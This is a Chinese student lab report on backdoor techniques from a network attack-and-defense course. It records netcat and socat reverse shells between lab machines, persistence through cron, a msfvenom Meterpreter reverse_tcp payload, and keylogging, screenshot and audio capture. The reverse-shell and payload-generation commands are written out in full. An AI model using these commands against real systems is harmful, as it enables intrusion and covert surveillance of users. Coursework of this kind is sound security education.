1.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 软件中本身就含有后门
  • 和软件进行捆绑,下载打开后进入系统
  • 由于系统漏洞,主机被攻击了,从而被安装了后门

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • 让用户以为是正常的软件,启动软件时后门就启动。
  • Linux定时任务系统 Cron,让使用者在固定时间或固定间隔执行程序。
  • Win系统 用任务计划程序来定时自动运行程序

(3)Meterpreter有哪些给你映像深刻的功能?

  • 记录键盘输入的字符
  • 开启摄像头

(4)如何发现自己有系统有没有被安装后门?

  • 系统运行速度突然变得缓慢:占用了内存和CPU资源,在后台运行了大量非法操作
  • 检查系统对外开放的端口,看有没有可疑的进程使用某个端口传输数据。
    netstat –an来查看所有TCP/UDP端口的连接

2.实验总结与体会
本次实验我学习了nc如何获取远程主机的Shell,使用msfenom生成后门可执行文件,然后尝试了一些Meterpreter常用功能,如记录键盘的输入,截屏,对网络系统的操作等。这一路做下来感觉太可怕,我们现在做的对于大神来说恐怕只是小case而已,提高安全意识从贴上摄像头开始...

3.实践过程记录

(1)使用netcat获取主机操作Shell,cron启动

win获得linux shell
  • win查看ip地址
    20145201 李子璇 《网络攻防》 后门原理与实践

  • win打开监听(这时需要允许防火墙访问)
    20145201 李子璇 《网络攻防》 后门原理与实践

  • linux反弹连接win
    20145201 李子璇 《网络攻防》 后门原理与实践

  • 在在windows下就获得了linux的shell,可以运行linux下的指令,我选择运行ls命令尝试一下:
    20145201 李子璇 《网络攻防》 后门原理与实践
    成功了

linux获得win shell
  • 在kali中获取linux的ip
    20145201 李子璇 《网络攻防》 后门原理与实践
  • 在win下反弹连接linux
    输入c:\nc文件目录路径>ncat.exe -e cmd.exe 192.168.134.128 5201
  • 连接上之后,在linux下可看到windows命令提示
    20145201 李子璇 《网络攻防》 后门原理与实践
cron启动

在linux终端输入crontab -e命令,可以修改用户的cron配置:
20145201 李子璇 《网络攻防》 后门原理与实践

修改一下
20145201 李子璇 《网络攻防》 后门原理与实践
此时,linux每分钟自动运行指令,反弹至win的5201端口。
20145201 李子璇 《网络攻防》 后门原理与实践
可以使用命令crontab -l 查看查看配置文件
20145201 李子璇 《网络攻防》 后门原理与实践
获取shell成功后,ls一下看看
20145201 李子璇 《网络攻防》 后门原理与实践

(2)使用socat获取主机操作Shell, 任务计划启动

  • windows使用socat获取kali shell:
    kali上用socat tcp-listen:5201把cmd绑定到端口5201
    并用socat tcp-l:5201 system:bash,pty,stderr反弹连接
    20145201 李子璇 《网络攻防》 后门原理与实践

windows使用socat readline tcp:192.168.134.129 5201开启监听
20145201 李子璇 《网络攻防》 后门原理与实践

检测一下
20145201 李子璇 《网络攻防》 后门原理与实践

(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(1分)

meterpreter

生成后门程序

  • 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.26.155.4 LPORT=5201 -f exe > 5201lzx.exe来生成后门程序,然后用ncat方法发送到windows机中。

20145201 李子璇 《网络攻防》 后门原理与实践

  • 在Kali端用msfconsole指令进行msf设置,使用监听模块,设置payload,设置反弹回连的IP和端口。
    20145201 李子璇 《网络攻防》 后门原理与实践

  • 运行 获取主机shell
    20145201 李子璇 《网络攻防》 后门原理与实践

(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

  • 用screenshot来截个图吧..
    20145201 李子璇 《网络攻防》 后门原理与实践

  • 获取记录击键记录..
    20145201 李子璇 《网络攻防》 后门原理与实践
    20145201 李子璇 《网络攻防》 后门原理与实践

  • 获取音频..
    20145201 李子璇 《网络攻防》 后门原理与实践
    20145201 李子璇 《网络攻防》 后门原理与实践

不过 提权失败了...

相关文章:

  • 2022-01-18
  • 2021-08-28
  • 2021-10-11
  • 2021-05-15
  • 2021-05-21
  • 2021-10-02
  • 2021-08-02
  • 2021-12-26
猜你喜欢
  • 2021-07-27
  • 2021-11-24
  • 2022-02-18
  • 2021-12-31
  • 2021-07-07
  • 2022-02-01
  • 2021-10-20
相关资源
相似解决方案